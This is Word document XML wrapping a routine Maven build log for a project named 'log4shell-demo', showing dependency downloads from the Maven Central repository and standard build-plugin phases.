    <w:p w14:paraId="2BB38C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E9E9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.pom (2.0 kB at 68 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718717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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.9/maven-plugin-descriptor-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EFF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.9/maven-plugin-descriptor-2.0.9.pom (2.1 kB at 86 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC32A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.9/maven-monitor-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BC33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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.9/maven-monitor-2.0.9.pom (1.3 kB at 61 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038E04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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E617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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.pom (3.4 kB at 155 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D8D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.2/plexus-compiler-api-2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F24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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.2/plexus-compiler-api-2.2.pom (865 B at 41 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6567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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.2/plexus-compiler-2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F38B1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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.2/plexus-compiler-2.2.pom (3.6 kB at 181 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF0868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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.8/plexus-utils-3.0.8.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126591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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.8/plexus-utils-3.0.8.pom (3.1 kB at 121 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D861F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.2/plexus-3.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A009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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.2/plexus-3.2.pom (19 kB at 493 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A583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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.2/plexus-compiler-manager-2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C540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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.2/plexus-compiler-manager-2.2.pom (690 B at 27 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084376F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.2/plexus-compiler-javac-2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36F4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.2/plexus-compiler-javac-2.2.pom (769 B at 26 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4579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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.2/plexus-compilers-2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B57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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.2/plexus-compilers-2.2.pom (1.2 kB at 56 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29329A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.5.5/plexus-container-default-1.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154E5D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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.5.5/plexus-container-default-1.5.5.pom (2.8 kB at 110 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60A0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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.5/plexus-utils-1.4.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E85E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.5/plexus-utils-1.4.5.pom (2.3 kB at 113 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883D70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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.2/plexus-classworlds-2.2.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC0C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.2/plexus-classworlds-2.2.2.pom (4.0 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7644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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean-reflect/3.4/xbean-reflect-3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE4B9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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean-reflect/3.4/xbean-reflect-3.4.pom (2.8 kB at 117 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A68C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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean/3.4/xbean-3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6577C0B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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean/3.4/xbean-3.4.pom (19 kB at 842 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A48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https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773AFC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https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.pom (145 B at 7.2 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFDC0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https://repo.maven.apache.org/maven2/commons-logging/commons-logging-api/1.1/commons-logging-api-1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD124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https://repo.maven.apache.org/maven2/commons-logging/commons-logging-api/1.1/commons-logging-api-1.1.pom (5.3 kB at 223 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68F0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https://repo.maven.apache.org/maven2/com/google/collections/google-collections/1.0/google-collections-1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEFA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https://repo.maven.apache.org/maven2/com/google/collections/google-collections/1.0/google-collections-1.0.pom (2.5 kB at 113 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D3F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https://repo.maven.apache.org/maven2/com/google/google/1/google-1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372080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https://repo.maven.apache.org/maven2/com/google/google/1/google-1.pom (1.6 kB at 68 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F63D5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https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C8C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https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.pom (747 B at 34 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D525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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.9/maven-plugin-api-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C54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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191FEF4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.1/plexus-utils-1.5.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AB3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.9/maven-core-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763277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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092CA7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/2.0.9/maven-plugin-api-2.0.9.jar (13 kB at 445 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112115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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.9/maven-plugin-parameter-documenter-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D402C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/2.0.9/maven-artifact-2.0.9.jar (89 kB at 2.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FEAB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9143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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-parameter-documenter/2.0.9/maven-plugin-parameter-documenter-2.0.9.jar (21 kB at 486 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B89776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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B629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https://repo.maven.apache.org/maven2/org/apache/maven/maven-settings/2.0.9/maven-settings-2.0.9.jar (49 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5DFD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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3D99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https://repo.maven.apache.org/maven2/org/apache/maven/maven-profile/2.0.9/maven-profile-2.0.9.jar (35 kB at 631 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850575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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.9/maven-error-diagnostics-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D348A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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.1/plexus-utils-1.5.1.jar (211 kB at 3.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A81EE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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5539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https://repo.maven.apache.org/maven2/org/apache/maven/maven-repository-metadata/2.0.9/maven-repository-metadata-2.0.9.jar (25 kB at 346 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5578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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD28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https://repo.maven.apache.org/maven2/org/apache/maven/maven-core/2.0.9/maven-core-2.0.9.jar (160 kB at 2.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09D0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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.9/maven-plugin-descriptor-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0983A96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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/2.0.9/maven-model-2.0.9.jar (87 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06E6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B28B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-error-diagnostics/2.0.9/maven-error-diagnostics-2.0.9.jar (14 kB at 181 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469BD7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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.9/maven-monitor-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A149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https://repo.maven.apache.org/maven2/org/apache/maven/maven-monitor/2.0.9/maven-monitor-2.0.9.jar (10 kB at 107 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99EA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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D89C6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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-descriptor/2.0.9/maven-plugin-descriptor-2.0.9.jar (37 kB at 378 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F46F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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00723C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact-manager/2.0.9/maven-artifact-manager-2.0.9.jar (58 kB at 584 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A28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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D9CC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https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-registry/2.0.9/maven-plugin-registry-2.0.9.jar (29 kB at 285 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743CED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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.2/plexus-compiler-api-2.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63CEF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https://repo.maven.apache.org/maven2/org/apache/maven/maven-project/2.0.9/maven-project-2.0.9.jar (122 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630711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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.2/plexus-compiler-manager-2.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214590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https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar (32 kB at 259 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D3945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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.2/plexus-compiler-javac-2.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EE21C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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/1.0/maven-toolchain-1.0.jar (33 kB at 263 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219278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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.2/plexus-compiler-api-2.2.jar (25 kB at 200 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31427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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.5.5/plexus-container-default-1.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCEA7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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.2/plexus-classworlds-2.2.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED067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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.2/plexus-compiler-manager-2.2.jar (4.6 kB at 35 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E70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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean-reflect/3.4/xbean-reflect-3.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CFCEB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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.jar (155 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663972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https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F72B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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.2/plexus-compiler-javac-2.2.jar (19 kB at 126 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FAE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https://repo.maven.apache.org/maven2/commons-logging/commons-logging-api/1.1/commons-logging-api-1.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B92E8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.2/plexus-classworlds-2.2.2.jar (46 kB at 294 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B6E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https://repo.maven.apache.org/maven2/com/google/collections/google-collections/1.0/google-collections-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D36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https://repo.maven.apache.org/maven2/commons-logging/commons-logging-api/1.1/commons-logging-api-1.1.jar (45 kB at 253 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C28E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https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFDE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https://repo.maven.apache.org/maven2/org/apache/xbean/xbean-reflect/3.4/xbean-reflect-3.4.jar (134 kB at 719 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422749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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.5.5/plexus-container-default-1.5.5.jar (217 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78341D5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https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.jar (121 kB at 577 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02564A9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https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.jar (358 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377DD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https://repo.maven.apache.org/maven2/com/google/collections/google-collections/1.0/google-collections-1.0.jar (640 kB at 2.8 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687DC5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3C154F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8873B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maven-resources-plugin:2.6:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701C4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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E16A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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C7F5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6D3354B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maven-compiler-plugin:3.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654546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2DB500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3EDEF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maven-surefire-plugin:2.12.4:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA9EB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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.12.4/surefire-booter-2.12.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7F6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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.12.4/surefire-booter-2.12.4.pom (3.0 kB at 138 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0F7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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.12.4/surefire-api-2.12.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0220B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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.12.4/surefire-api-2.12.4.pom (2.5 kB at 113 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACC2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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.12.4/maven-surefire-common-2.12.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B061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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.12.4/maven-surefire-common-2.12.4.pom (5.5 kB at 149 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57883B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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.1/maven-plugin-annotations-3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204CD5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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.1/maven-plugin-annotations-3.1.pom (1.6 kB at 74 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAC5EC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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.1/maven-plugin-tools-3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCB1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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-tools/3.1/maven-plugin-tools-3.1.pom (16 kB at 647 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E84C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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.9/maven-reporting-api-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D70D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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.9/maven-reporting-api-2.0.9.pom (1.8 kB at 72 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49333D1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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.9/maven-reporting-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBCA1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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.9/maven-reporting-2.0.9.pom (1.5 kB at 74 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58870A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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.0.9/maven-toolchain-2.0.9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4812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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.0.9/maven-toolchain-2.0.9.pom (3.5 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACAA1D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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.1/commons-lang3-3.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB04A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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.1/commons-lang3-3.1.pom (17 kB at 668 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F277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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/22/commons-parent-22.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B04E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https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/22/commons-parent-22.pom (42 kB at 1.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C732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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/1.3/maven-common-artifact-filters-1.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7A2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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/1.3/maven-common-artifact-filters-1.3.pom (3.7 kB at 106 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2263F69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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/12/maven-shared-components-12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7A0F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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/12/maven-shared-components-12.pom (9.3 kB at 424 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E656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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/13/maven-parent-13.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64935C2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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/13/maven-parent-13.pom (23 kB at 984 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04422F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36BF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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.pom (1.2 kB at 43 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215477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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.12.4/surefire-booter-2.12.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40850D7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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.12.4/surefire-api-2.12.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61D9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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.12.4/maven-surefire-common-2.12.4.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFE3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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.1/commons-lang3-3.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5947EB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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/1.3/maven-common-artifact-filters-1.3.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B40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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.12.4/surefire-booter-2.12.4.jar (35 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11647F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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.8/plexus-utils-3.0.8.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E99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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.12.4/surefire-api-2.12.4.jar (118 kB at 3.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149AEB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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.9/maven-reporting-api-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BC6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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/1.3/maven-common-artifact-filters-1.3.jar (31 kB at 1.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41CB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.0.9/maven-toolchain-2.0.9.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D300D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https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/2.0.9/maven-reporting-api-2.0.9.jar (10 kB at 260 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079257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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.1/maven-plugin-annotations-3.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433714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https://repo.maven.apache.org/maven2/org/apache/maven/maven-toolchain/2.0.9/maven-toolchain-2.0.9.jar (38 kB at 745 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DE8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https://repo.maven.apache.org/maven2/org/apache/maven/plugin-tools/maven-plugin-annotations/3.1/maven-plugin-annotations-3.1.jar (14 kB at 212 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323B83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https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.1/commons-lang3-3.1.jar (316 kB at 3.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F1CD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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.8/plexus-utils-3.0.8.jar (232 kB at 3.0 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2AF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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.12.4/maven-surefire-common-2.12.4.jar (263 kB at 2.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E697B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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2449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2F2D33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maven-jar-plugin:2.4:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742D45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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/2.5/maven-archiver-2.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4309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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/2.5/maven-archiver-2.5.pom (4.5 kB at 197 kB/s)</w:t>
      </w:r>
    </w:p>
